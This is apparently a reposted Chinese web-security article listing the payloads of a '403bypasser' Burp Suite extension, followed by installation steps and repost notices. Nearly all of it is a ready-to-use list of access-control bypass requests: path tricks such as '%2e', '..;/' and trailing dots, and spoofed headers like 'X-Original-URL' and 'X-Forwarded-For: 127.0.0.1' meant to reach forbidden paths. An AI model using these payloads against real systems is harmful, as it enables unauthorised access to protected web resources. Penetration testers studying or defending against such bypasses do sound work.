payloads:$ 1:HOSTNAME $ 2:PATH
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/
安装
BurpSuite -> Extender
-> Extensions
-> Add
-> Extension Type: Python
-> Select file: 403bypasser.py
-> Next till Finish
文章转自https://zhuanlan.zhihu.com/p/337867355
如有侵权,请联系删除
推荐阅读
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247506024&idx=1&sn=846bc3cdd8035614df78003905f6d09f&chksm=c04d5f56f73ad64084fa91dedd0424979f946444a586ac46d6e6f4ee526bf7790a30800eac7d#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh